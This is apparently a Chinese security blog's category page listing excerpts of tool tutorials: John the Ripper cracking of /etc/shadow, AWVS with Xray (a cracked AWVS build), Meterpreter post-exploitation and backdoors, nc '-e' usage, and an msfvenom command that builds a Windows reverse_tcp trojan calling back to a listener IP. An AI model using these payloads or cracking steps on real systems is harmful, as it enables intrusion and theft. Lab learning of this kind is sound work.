工具使用
文章平均质量分 63
「已注销」
公众号 猪猪谈安全 获取大量学习资源!
展开
-
linux 密码文件 /etc/shadow md5,SHA256,SHA512 破解
目录环境shadow文件解析John the Ripper安装John the Ripper破解环境Kali系统 John the Ripper密码破解者shadow文件解析文件的格式为:{用户名}:{加密后的口令密码}:{口令最后修改时间距原点(1970-1-1)的天数}:{口令最小修改间隔(防止修改口令,如果时限未到,将恢复至旧口令):{口令最大修改间隔}:{口令失效前的警告天数}:{账户不活动天数}:{账号失效天数}:{保留}其中{加密后的口令密码}的格式转载 2021-05-12 16:24:18 · 1265 阅读 · 0 评论 -
AVWS+Xray联动(详细版)
正文awvs的爬虫很厉害,xray的扫描能力更强,而且xray的社区版不能爆破子域名。awvs+xray联动就互相取长补短了。首先安装AWVS(这里用的是AWVS13破解版,软件在文末),具体破解版安装,压缩包里面有文档,这里就不再详细叙述了。安装好界面如下。安装好后我们就在Xray(社区版,软件在文末)开启监听。python xray.exe webscan --listen 127.0.0.1:8888 --html-output 456.html然后...原创 2021-04-30 08:39:19 · 4227 阅读 · 0 评论 -
burpsuite保存请求日志文件
首先打开burpsuite,然后i点击options在logging里面proxy栏目下勾选requests然后创建文件名字返回桌面会出现一个test的文件夹然后我们抓包,产生的请求都会保存到这个test文件里面。原创 2020-08-17 10:40:32 · 4498 阅读 · 0 评论 -
rdesktop使用参数
Usage: rdesktop [options] server[:port]-u: 用户名-d: 域-s: 可远程启动的shell/无缝应用程序-c: 工作目录-p: 密码(-to prompt)-n: 客户端主机名-k: 服务器上的键盘布局(en-us、de、sv等)-g: 桌面几何(宽X高[@DPI][+X[+Y]])-i: 启用智能卡身份验证,密码用作pin-f: 全屏模式-b: 强制位图更新-五十: 本地代码页-A: seallessrdp sh原创 2020-08-11 14:52:34 · 882 阅读 · 0 评论 -
后渗透之meterpreter使用攻略
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。0x01.系统命令1)基本系统命令sessions #sessions –h 查看帮助sessions -i <ID值> #进入会话 -k 杀死会话background #将当前会话放置后台run #执行已有的模块,输入run后按两下tab,列出已有的脚转载 2020-08-10 10:46:40 · 2181 阅读 · 1 评论 -
msfvenom生成木马的简单利用
1、简介本篇文章将会用msfvenom生成一个windows下可执行木马exe的文件,用kali监听,靶机win10运行木马程序,实现控制靶机win10。2、实验环境1、一台kali虚拟机 ip为192.168.110.1402、一台win10虚拟机3、实验步骤1、首先使用msfvenom生成一个可以被windows执行的exe木马文件。msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.110.140 lpor.原创 2020-08-10 10:43:26 · 5622 阅读 · 1 评论 -
metasploit、msfvenom生成木马入侵电脑及手机
简介msfvenommsfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件查看所有--payload的模块msfvenom -l payloads文件后缀名-f的格式msfvenom --help-formatsmetasploitMetasploit Framework(MSF)是一款开源安全漏洞转载 2020-08-09 15:25:47 · 1602 阅读 · 5 评论 -
msfvenom的参数使用
-l、 --list<type>列出[type]的所有模块。类型有:有效载荷、编码器、nop、平台、arch、encrypt、format、all-p、 --payload<payload>要使用的payload(--list payloads to list,--列出参数的选项)。为自定义指定“-”或STDIN--list options list——payload<value>的标准、高级和规避选项-f、 --格式(使用格式>列表)-e、 --编原创 2020-08-08 21:58:48 · 1464 阅读 · 1 评论 -
nc的参数使用
-c shell命令为“-e”;使用/bin/sh来执行[hargerous!!]-e文件名程序在连接后执行[危险!!]-b允许广播-g网关源路由跃点,最多8个-G num源路由指针:4,8,12。。。-h这个垃圾-发送的线路和扫描的端口的延迟间隔为1秒-k在套接字上设置keepalive选项-l监听模式,用于入站连接-n仅数字IP地址,无DNS-o文件十六进制流量转储-p端口本地端口号-r随机化本地和远程端口-在stdin上的EOF和秒延迟后q秒退出原创 2020-08-09 11:33:10 · 1123 阅读 · 0 评论